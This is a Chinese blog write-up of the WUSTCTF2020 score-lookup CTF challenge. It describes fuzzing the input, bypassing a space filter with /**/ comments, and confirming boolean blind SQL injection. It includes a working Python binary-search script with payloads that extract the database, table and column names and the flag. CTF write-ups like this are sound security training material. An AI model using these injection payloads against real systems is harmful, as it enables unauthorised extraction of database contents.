[WUSTCTF2020]颜值成绩查询 1

于 2024-07-14 20:49:34 发布
阅读量145 收藏 1
点赞数 7
分类专栏: CTF-web-wp 文章标签: python web安全 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ubaichu/article/details/140422664
版权

目录

题目分析

输入一些数字测试结果

题目是一个输入框在这里插入图片描述
输入1,显示100分在这里插入图片描述
输入2、3、4,都会出现一些奇奇怪怪的字符在这里插入图片描述
输入0和其他数字,显示学生编号不存在在这里插入图片描述

fuzz

burp抓包后传入intruder模块,设置变量,传入字典开始fuzz在这里插入图片描述
在这里插入图片描述
结果:只有空格被过滤了在这里插入图片描述

测试注入类型

分别输入:

1/**/and/**/1        (结果:100分)
1/**/and/**/0        (结果:显示不存在)

页面只返回正确或错误的信息,可以用bool盲注

Python脚本

之前做别的题的时候留了大佬的二分法脚本,修改payload之后可用于此题

import requests
import time

url = 'http://cd82b63c-6c9a-46d7-8288-09fea5ba97f3.node5.buuoj.cn:81/?stunum='
i = 0
flag = ''
while True:
    i += 1
    # 从可打印字符开始
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        print(begin, tmp, end)
        time.sleep(0.1)
        # 爆数据库
        # payload = "1/**/and/**/(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
        # 爆表
        # payload = "1/**/and/**/(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
        # 爆字段
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='flag')),%d,1))>%d)" % (i, tmp)
        # 爆flag
        # payload = "1/**/and/**/(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)" % (i, tmp)


        r = requests.get(url + payload)
        if 'admin' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

结果(flag不在fiag字段里!)在这里插入图片描述

白初&
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 383
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
[WUSTCTF2020]颜值成绩查询
pakho_C的博客
08-14 1171
测试输入1-5 各有输出,1为 Hi admin, your score is: 100。0和大于6的显示 student number not exists.[WUSTCTF2020]颜值成绩查询。得到字段名为flag,value。得到表名为flag和score。参考我做的另外一道题的。得到数据库名为ctf。...
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 473
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
[WUSTCTF2020]颜值成绩查询1
alwtj的博客
06-10 337
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 236
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 579
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩查询 --不会编程的崽
不会编程的崽的博客
03-17 856
sql注入 盲注
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 168
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 766
[WUSTCTF2020]颜值成绩查询(布尔注入)
re学习笔记(56)WUSTCTF – Re方向WP
12-21
接下来,我们讨论了"re-level1"。在这个级别,作者发现了一个19位的flag经过某种变换后被输出。通过分析程序的main函数,特别是其中的循环结构,作者编写了一个脚本来模拟这个变换过程,从而得到了正确的flag:`wctf...
linux操作系统入门实验报告
03-09
- `cp`:复制文件或目录,`cp file1 file2`将file1复制为file2。 - `mv`:移动或重命名文件或目录,`mv oldfile newfile`重命名文件。 - `cat`:查看文件内容,如`cat filename`显示文件内容。 - `more`或`less`...
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 127
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 755
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
Nginx七层(应用层)反向代理:UWSGI代理uwsgi_pass篇
jclee95的个人博客
07-10 1066
Nginx提供了多种应用层反向代理支持,包括proxy_pass、uwsgi_pass、fastcgi_pass和scgi_pass等。其中,proxy_pass指令可以接受一个URL参数,用于实现对HTTP/HTTPS协议的反向代理;uwsgi_pass用于代理到uWSGI应用服务器;fastcgi_pass用于代理到FastCGI服务器;而scgi_pass则用于代理到SCGI(Simple Common Gateway Interface)应用。这些指令使Nginx能够灵活地处理不同类型的后端服务和应
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 697
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
leetcode--验证二叉搜索树
liulanba的博客
07-09 665
给你一个二叉树的根节点 root ,判断其是否是一个有效的二叉搜索树。有效 二叉搜索树定义如下:节点的左子树只包含 小于 当前节点的数。节点的右子树只包含 大于 当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。示例 1:输入:root = [2,1,3]输出:true示例 2:输入:root = [5,1,4,null,null,3,6]输出:false解释:根节点的值是 5 ,但是右子节点的值是 4。提示:树中节点数目范围在[1, 104] 内。
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的md5值等于$md5本身,会输出另一条特定的字符串。在第三个关卡中,如果传入的参数$get_flag中不包含空格,则会将$get_flag传给系统函数进行执行,并输出一条特定的字符串。 关于题目的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值